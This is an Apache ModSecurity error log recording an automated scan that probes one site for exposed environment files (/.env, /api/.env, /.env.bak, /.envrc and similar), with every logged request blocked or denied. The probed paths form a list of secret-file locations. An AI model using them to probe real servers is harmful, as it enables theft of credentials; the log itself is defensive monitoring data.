[Fri Mar 20 15:01:16.145905 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "ab1TLGLvrbuE12wYiLe4LgAAABA"]
[Fri Mar 20 15:01:16.146034 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "ab1TLGLvrbuE12wYiLe4LgAAABA"]
[Fri Mar 20 15:01:16.149828 2026] [authz_core:error] [pid 2817640] [client 162.158.86.254:13016] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Fri Mar 20 15:01:16.152949 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "ab1TLG8zubx8zfwe9oW5NgAAAAU"]
[Fri Mar 20 15:01:16.153129 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "ab1TLG8zubx8zfwe9oW5NgAAAAU"]
[Fri Mar 20 15:01:16.153244 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "ab1TLG8zubx8zfwe9oW5NgAAAAU"]
[Fri Mar 20 15:01:16.158882 2026] [:error] [pid 2815713] [client 162.158.86.142:13502] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "ab1TLJJiwBXnNifSr5vepgAAAAQ"]
[Fri Mar 20 15:01:16.158977 2026] [:error] [pid 2815713] [client 162.158.86.142:13502] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "ab1TLJJiwBXnNifSr5vepgAAAAQ"]
[Fri Mar 20 15:01:16.159095 2026] [:error] [pid 2815713] [client 162.158.86.142:13502] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "ab1TLJJiwBXnNifSr5vepgAAAAQ"]
[Fri Mar 20 15:01:16.161557 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "ab1TLKx8_pxqReT7SyGPFAAAAAM"]
[Fri Mar 20 15:01:16.161648 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "ab1TLKx8_pxqReT7SyGPFAAAAAM"]
[Fri Mar 20 15:01:16.161758 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "ab1TLKx8_pxqReT7SyGPFAAAAAM"]
[Fri Mar 20 15:01:16.169477 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "ab1TLEGu3yPOFBRkxZtwwgAAAAA"]
[Fri Mar 20 15:01:16.169574 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "ab1TLEGu3yPOFBRkxZtwwgAAAAA"]
[Fri Mar 20 15:01:16.169696 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "ab1TLEGu3yPOFBRkxZtwwgAAAAA"]
[Fri Mar 20 15:01:16.170035 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "ab1TLDQ9Th-2Y9b0JRd1swAAAAE"]
[Fri Mar 20 15:01:16.170119 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "ab1TLDQ9Th-2Y9b0JRd1swAAAAE"]
[Fri Mar 20 15:01:16.170218 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "ab1TLDQ9Th-2Y9b0JRd1swAAAAE"]
[Fri Mar 20 15:01:16.173019 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /private/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/private/.env"] [unique_id "ab1TLPy1_WiwY9KfWu_4vwAAAAI"]
[Fri Mar 20 15:01:16.173126 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/private/.env"] [unique_id "ab1TLPy1_WiwY9KfWu_4vwAAAAI"]
[Fri Mar 20 15:01:16.173252 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/private/.env"] [unique_id "ab1TLPy1_WiwY9KfWu_4vwAAAAI"]
[Fri Mar 20 15:01:16.181387 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.local"] [unique_id "ab1TLKx8_pxqReT7SyGPFQAAAAM"]
[Fri Mar 20 15:01:16.181486 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.local"] [unique_id "ab1TLKx8_pxqReT7SyGPFQAAAAM"]
[Fri Mar 20 15:01:16.181601 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.local"] [unique_id "ab1TLKx8_pxqReT7SyGPFQAAAAM"]
[Fri Mar 20 15:01:16.182581 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "ab1TLEnH70iMTzyPh3kWjQAAAAY"]
[Fri Mar 20 15:01:16.182668 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "ab1TLEnH70iMTzyPh3kWjQAAAAY"]
[Fri Mar 20 15:01:16.182774 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "ab1TLEnH70iMTzyPh3kWjQAAAAY"]
[Fri Mar 20 15:01:16.189797 2026] [:error] [pid 2815713] [client 162.158.86.142:13502] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.json"] [unique_id "ab1TLJJiwBXnNifSr5vepwAAAAQ"]
[Fri Mar 20 15:01:16.189892 2026] [:error] [pid 2815713] [client 162.158.86.142:13502] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.json"] [unique_id "ab1TLJJiwBXnNifSr5vepwAAAAQ"]
[Fri Mar 20 15:01:16.190010 2026] [:error] [pid 2815713] [client 162.158.86.142:13502] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.json"] [unique_id "ab1TLJJiwBXnNifSr5vepwAAAAQ"]
[Fri Mar 20 15:01:16.193484 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_backup"] [unique_id "ab1TLDQ9Th-2Y9b0JRd1tAAAAAE"]
[Fri Mar 20 15:01:16.193572 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_backup"] [unique_id "ab1TLDQ9Th-2Y9b0JRd1tAAAAAE"]
[Fri Mar 20 15:01:16.193681 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_backup"] [unique_id "ab1TLDQ9Th-2Y9b0JRd1tAAAAAE"]
[Fri Mar 20 15:01:16.196869 2026] [authz_core:error] [pid 2822566] [client 162.158.86.254:13007] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env~
[Fri Mar 20 15:01:16.201571 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env1"] [unique_id "ab1TLG8zubx8zfwe9oW5NwAAAAU"]
[Fri Mar 20 15:01:16.201662 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env1"] [unique_id "ab1TLG8zubx8zfwe9oW5NwAAAAU"]
[Fri Mar 20 15:01:16.201770 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env1"] [unique_id "ab1TLG8zubx8zfwe9oW5NwAAAAU"]
[Fri Mar 20 15:01:16.201871 2026] [:error] [pid 2817640] [client 162.158.86.254:13016] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env2"] [unique_id "ab1TLBq8pDZXKMuYECLOWwAAAAk"]
[Fri Mar 20 15:01:16.201965 2026] [:error] [pid 2817640] [client 162.158.86.254:13016] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env2"] [unique_id "ab1TLBq8pDZXKMuYECLOWwAAAAk"]
[Fri Mar 20 15:01:16.202082 2026] [:error] [pid 2817640] [client 162.158.86.254:13016] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env2"] [unique_id "ab1TLBq8pDZXKMuYECLOWwAAAAk"]
[Fri Mar 20 15:01:16.213335 2026] [authz_core:error] [pid 2815709] [client 162.158.86.143:11588] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.dist
[Fri Mar 20 15:01:16.214451 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envrc"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.envrc"] [unique_id "ab1TLKx8_pxqReT7SyGPFgAAAAM"]
[Fri Mar 20 15:01:16.214547 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.envrc"] [unique_id "ab1TLKx8_pxqReT7SyGPFgAAAAM"]
